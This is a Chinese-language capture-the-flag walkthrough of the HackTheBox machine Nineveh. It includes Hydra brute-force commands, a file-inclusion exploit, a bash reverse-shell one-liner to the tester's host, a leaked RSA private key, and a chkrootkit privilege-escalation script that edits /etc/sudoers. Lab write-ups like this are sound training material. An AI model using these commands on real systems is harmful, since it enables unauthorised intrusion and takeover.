目标信息
IP地址:
10.10.10.43
信息收集
ICMP检测
┌──(root㉿hacker)-[/home/…/Documents/pentest_notes/nineves/nmap_reports]
└─# ping -c 4 10.10.10.43
PING 10.10.10.43 (10.10.10.43) 56(84) bytes of data.
64 bytes from 10.10.10.43: icmp_seq=1 ttl=63 time=237 ms
64 bytes from 10.10.10.43: icmp_seq=2 ttl=63 time=239 ms
64 bytes from 10.10.10.43: icmp_seq=3 ttl=63 time=240 ms
64 bytes from 10.10.10.43: icmp_seq=4 ttl=63 time=246 ms
--- 10.10.10.43 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3015ms
rtt min/avg/max/mdev = 237.099/240.645/246.100/3.357 ms攻击机和靶机间通信状态良好。
防火墙检测
# Nmap 7.94SVN scan initiated Thu Jun 20 08:31:38 2024 as: nmap -sA -p- --min-rate 2000 -oN ./ack_result.txt 10.10.10.43
Nmap scan report for 10.10.10.43 (10.10.10.43)
Host is up (0.28s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp unfiltered http
443/tcp unfiltered https
# Nmap done at Thu Jun 20 08:32:44 2024 -- 1 IP address (1 host up) scanned in 66.52 seconds靶机开放了2个TCP端口。
网络端口扫描
TCP端口扫描结果
# Nmap 7.94SVN scan initiated Thu Jun 20 08:35:18 2024 as: nmap -sS -sV -A -p 80,443 -oN ./tcp_result.txt 10.10.10.43
Nmap scan report for 10.10.10.43 (10.10.10.43)
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
| tls-alpn:
|_ http/1.1
|_http-title: Site doesn't have a title (text/html).
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone|storage-misc
Running (JUST GUESSING): Linux 3.X|4.X (90%), Crestron 2-Series (86%), Google Android 4.X (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/o:google:android:4.0 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 3.10 - 4.11 (90%), Linux 3.16 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Linux 3.12 (88%), Linux 3.13 (88%), Linux 3.13 or 4.2 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 266.58 ms 10.10.14.1 (10.10.14.1)
2 266.58 ms 10.10.10.43 (10.10.10.43)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 08:35:55 2024 -- 1 IP address (1 host up) scanned in 37.44 secondsUDP端口开放列表扫描结果
# Nmap 7.94SVN scan initiated Thu Jun 20 08:37:05 2024 as: nmap -sU -p- --min-rate 2000 -oN ./udp_port.txt 10.10.10.43
Nmap scan report for 10.10.10.43 (10.10.10.43)
Host is up (0.29s latency).
All 65535 scanned ports on 10.10.10.43 (10.10.10.43) are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)
# Nmap done at Thu Jun 20 08:38:13 2024 -- 1 IP address (1 host up) scanned in 68.38 secondsUDP端口详细信息扫描结果
(无)同时发现靶机操作系统为Ubuntu Linux,内核版本为Linux 3.10 - 4.11,有主域名nineveh.htb。
服务探测
Web应用程序(443端口)
访问主页:https://nineveh.htb:
查看源代码未发现任何信息,直接扫描目录:
# Dirsearch started Thu Jun 20 09:08:46 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u https://nineveh.htb/ -x 400,403,404 -t 60 -e php,js,html,asp,aspx,txt,zip,tar.gz,pcap
301 309B https://nineveh.htb/db -> REDIRECTS TO: https://nineveh.htb/db/
200 3KB https://nineveh.htb/db/
200 3KB https://nineveh.htb/db/index.php成功发现/db目录,访问之后发现部署了PHPLiteAdmin数据库管理系统,版本为1.9:
Web应用程序(80端口)
打开主页:http://nineveh.htb
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
</body></html>直接扫描目录,发现了info.php(PHPInfo)和/department目录,访问目录发现是登录页面:
同时在该页面的源代码中发现如下注释:
<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->确定了该页面服务有用户admin。
渗透测试
爆破PHPLiteAdmin密码
打开https://nineveh.htb/db/index.php,随便输入一个密码,截取登录流量:
随后使用Hydra爆破密码(字典使用rockyou.txt):
hydra -L /usr/share/wordlists/rockyou.txt -p yes -t 60 -f nineveh.htb https-post-form "/db/index.php:password=^USER^&remember=^PASS^&login=Log+In&proc_login=true:Incorrect"
成功找到PHPLiteAdmin登录口令:password123。
虽然数据库内看似没有任何信息,但是该版本PHPMyAdmin存在代码写入漏洞。
爆破陌生站点密码
尝试爆破HTTPS站点下/department系统的密码:
hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 60 -f nineveh.htb http-post-form "/department/login.php:username=^USER^&password=^PASS^&rememberme=on:Invalid"
成功找到登录凭据:
- 用户名:
admin - 密码:
1q2w3e4r5t
直接登录:
文件包含漏洞利用
登录后台之后,点击Notes按钮,发现网页地址栏的格式非常像文件包含漏洞:
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt尝试将其改为../../../../../../../etc/passwd,失败。
尝试包含关键字ninevehNotes,成功:
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes/../../../../../../etc/passwd
直接回PHPLiteAdmin根据漏洞描述在/var/tmp目录下创建一个后门木马:
随后使用BurpSuite访问文件包含页面反弹Shell:
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/443 0>&1'
成功!!
权限提升
发现SSH私钥
进入系统之后,在/var/www目录下进行预信息收集,发现了陌生目录/secure_notes:
里面有index.html文件和一张图片。尝试访问https://nineveh.htb/secure_notes/:
<html>
<body>
<center><img src=nineveh.png /></center>
</body>
</html>尝试将图片保存到本地,使用binwalk进行分析,发现图片末尾追加了一个Tar压缩包:
使用binwalk命令分离文件:
binwalk -e ./nineveh.png --run-as=root解压压缩包后,发现里面有SSH的公私钥:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----猜测可能靶机的SSH服务只对本机IP(127.0.0.1)开放。
本地信息收集
基本系统信息
进程列表
计划任务列表
环境变量
用户信息
用户家目录
特殊权限文件
开放端口信息
敏感文件权限
容器软件
端口敲门配置文件
经分析研判,发现靶机/var/www/ssl/secure_notes/nineveh.png文件存在隐写,拼接了一个含有SSH私钥文件的压缩包;且靶机SSH服务的端口敲门顺序为571、290、911,决定通过登录SSH(amrois用户)进行提权。
登录成功!!
定时程序提权
在靶机根目录下发现了/report文件夹:
还发现了当前用户在定时运行/usr/sbin/report-reset.sh脚本,该脚本会删除该日志目录下的所有文本文件,但清除过后隔一段时间该目录下又会多出其它日志,而且文件名中的时间在不断变化,因此确定除了当前用户运行的脚本,靶机中还有别的计划任务在运行。
尝试打开其中一个文件,复制部分输出的内容到网络上搜索,发现大多数结果都和chkrootkit病毒检测程序有关:
点击第一个结果,查看博文中记录的chkrootkit输出日志,发现其内容和/report目录下的日志格式和内容几乎完全相同,基本确定系统在定时运行/usr/bin/chkrootkit程序。
尝试使用chkrootkit v0.49的权限提升漏洞(CVE-2014-0476)进行提权攻击(创建恶意脚本/tmp/update,随后等待):
#! /usr/bin/python3
import os
if os.path.exists("/tmp/id.txt"):
exit(0)
os.system("id > /tmp/id.txt")
with open("/etc/sudoers","a") as f:
f.write("%amrois ALL=(ALL:ALL) NOPASSWD:ALL")过一会儿再次使用sudo -l命令查询权限,修改成功:
直接使用sudo su -命令切换用户至root:
提权成功!!!!
Flag文件展示